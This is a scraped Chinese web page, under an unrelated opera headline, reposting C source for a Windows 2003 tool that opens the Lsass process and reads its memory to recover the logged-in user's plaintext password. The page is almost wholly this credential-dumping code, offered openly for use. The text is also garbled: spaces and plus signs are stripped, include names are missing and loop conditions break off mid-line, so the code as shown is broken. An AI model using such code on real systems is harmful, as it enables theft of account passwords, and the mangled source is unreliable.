中财网越剧包公打銮驾全剧:XP 和2003的Lsass进程中明文密码
来源:百度文库 编辑:中财网 时间:2024/05/06 12:18:54
用Winhex读取XP和2003下的Lsass进程的内存数据,可以读取当前登录用户的明文密码.
sourcecode:
//********************************************************************************
//Version:V1.0
//Coder:WinEggDrop
//DateRelease:12/15/2004
//Purpose:ToDemonstrateSearchingLogonUserPasswordOn2003Box,TheMethod
// UsedIsPrettyUnwise,ButThisMayBeTheOnlyWayToReviewThe
// LogonUser'sPasswordOnWindows2003.
//TestPlatForm:Windows2003
//CompiledOn:VC 6.0
//********************************************************************************
#include
#include
#include
#defineBaseAddress0x002b5000 //TheBaseMemoryAddressToSearch;ThePasswordMayBeLocatedBeforeTheAddressOrFarMoreFromThisAddress,WhichCausesTheResultUnreliable
char Password[MAX_PATH]={0}; //StoreTheFoundPassword
//FunctionProtoTypeDeclaration
//------------------------------------------------------------------------------------------------------
BOOL FindPassword(DWORDPID);
int Search(char*Buffer,constUINTnSize);
DWORDGetLsassPID();
BOOL Is2003();
//------------------------------------------------------------------------------------------------------
//EndOfFucntionProtoTypeDeclaration
intmain()
{
DWORDPID=0;
printf("Windows2003PasswordViewerV1.0ByWinEggDrop\n\n");
if(!Is2003()) //CheckOutIfTheBoxIs2003
{
printf("TheProgramCan'tOnlyRunOnWindows2003Platform\n");
return-1;
}
PID=GetLsassPID(); //GetTheLsass.exePID
if(PID==0) //FailToGetPIDIfReturningZerom
{
return-1;
}
FindPassword(PID); //FindThePasswordFromLsass.exeMemory
return0;
}
//Endmain()
//------------------------------------------------------------------------------------
//Purpose:SearchTheMemory&TryToGetThePassword
//ReturnType:int
//Parameters:
// In:char*Buffer -->TheMemoryBufferToSearch
// Out:constUINTnSize -->TheSizeOfTheMemoryBuffer
//Note:TheProgramTriesToLocateTheMagicString"LocalSystemRemoteProcedure",
// SinceThePasswordIsNearTheAboveLocation,ButIt'sNotAlwaysTrueThat
// WeWillFindTheMagicString,OrEvenWeFindIt,ThePasswordMayBeLocated
// AtSomeOtherPlace.WeOnlyLookForLuck
//------------------------------------------------------------------------------------
intSearch(char*Buffer,constUINTnSize)
{
UINTOffSet=0;
UINTi=0;
UINTj=0;
UINTCount=0;
if(Buffer==NULL)
{
return-1;
}
for(i=0;i
/*TheBelowIsToFindTheMagicString,WhySoComplicated?ThatWillThankMS.TheSeparationFromWordToWord
IsNotSeparatedWithASpace,ButWithAEndingCharacter,SoAnySearchAPILikestrstr()WillFailToLocate
TheMagicString,WeHaveToDoItManuallyAndSlowly
*/
if(Buffer[i]=='L')
{
OffSet=0;
if(strnicmp(&Buffer[i OffSet],"LocalSystem",strlen("LocalSystem"))==0)
{
OffSet =strlen("LocalSystem") 1;
if(strnicmp(&Buffer[i OffSet],"Remote",strlen("Remote"))==0)
{
OffSet =strlen("Remote") 1;
if(strnicmp(&Buffer[i OffSet],"Procedure",strlen("Procedure"))==0)
{
OffSet =strlen("Procedure") 1;
if(strnicmp(&Buffer[i OffSet],"Call",strlen("Call"))==0)
{
i =OffSet;
break;
}
}
}
}
}
}
if(i
ZeroMemory(Password,sizeof(Password));
for(;i
if(Buffer[i]==0x02&&Buffer[i 1]==0&&Buffer[i 2]==0&&Buffer[i 3]==0&&Buffer[i 4]==0&&Buffer[i 5]==0&&Buffer[i 6]==0)
{
/*TheBelowCodeIsToRetrieveThePassword.SinceTheStringIsInUnicodeFormat,SoWeWillDoItIn
ThatWay
*/
j=i 7;
for(;j
if(Buffer[j]> 0)
{
Password[Count ]=Buffer[j];
}
else
{
break;
}
}
returni 7; //OneFlagToIndicateWeFindThePassword
}
}
}
return-1; //Well,WeFailToFindThePassword,AndThisAlwaysHappens
}
//EndSearch
//------------------------------------------------------------------------------------
//Purpose:ToGetTheLsass.exePID
//ReturnType:DWORD
//Parameters: None
//------------------------------------------------------------------------------------
DWORDGetLsassPID()
{
HANDLEhProcessSnap;
HANDLEhProcess=NULL;
PROCESSENTRY32pe32;
DWORDPID=0;
hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hProcessSnap==INVALID_HANDLE_VALUE)
{
printf("FailToCreateSnapShot\n");
return0;
}
pe32.dwSize=sizeof(PROCESSENTRY32);
if(!Process32First(hProcessSnap,&pe32))
{
CloseHandle(hProcessSnap); //Mustcleanupthesnapshotobject!
return0;
}
do
{
if(strcmpi(pe32.szExeFile,"Lsass.EXE")==0)
{
PID=pe32.th32ProcessID;
break;
}
}while(Process32Next(hProcessSnap,&pe32));
CloseHandle(hProcessSnap);
returnPID;
}
//EndGetLsassPID()
//------------------------------------------------------------------------------------
//Purpose:ToFindThePassword
//ReturnType:BOOLEAN
//Parameters:
// In:DWORDPID -> TheLsass.exe'sPID
//------------------------------------------------------------------------------------
BOOLFindPassword(DWORDPID)
{
HANDLEhProcess=NULL;
char Buffer[5*1024]={0};
DWORD ByteGet=0;
int Found=-1;
hProcess=OpenProcess(PROCESS_VM_READ,FALSE,PID); //OpenProcess
if(hProcess==NULL)
{
printf("FailToOpenProcess\n");
returnFALSE;
}
if(!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5*1024,&ByteGet)) //ReadTheMemoryFromLsass.exe
{
printf("FailToReadMemory\n");
CloseHandle(hProcess);
returnFALSE;
}
CloseHandle(hProcess);
Found=Search(Buffer,ByteGet); //SearchThePassword
if(Found>=0) //WeMayFindThePassword
{
if(strlen(Password)>0) //Yes,WeFindThePasswordEvenWeDon'tKnowIfThePasswordIsCorrectOrNot
{
printf("FoundPasswordAt#0x%x->\"%s\"\n",Found BaseAddress,Password);
}
}
else
{
printf("FailToFindThePassword\n");
}
returnTRUE;
}
//EndFindPassword
//------------------------------------------------------------------------------------
//Purpose:CheckIfTheBoxIsWindows2003
//ReturnType:BOOLEAN
//Parameters: None
//------------------------------------------------------------------------------------
BOOLIs2003()
{
OSVERSIONINFOEXosvi;
BOOLb0sVersionInfoEx;
ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);
if(!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO*)&osvi)))
{
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
}
return(osvi.dwMajorVersion==5&&osvi.dwMinorVersion==2);
}
//EndIs2003()
//EndOfFile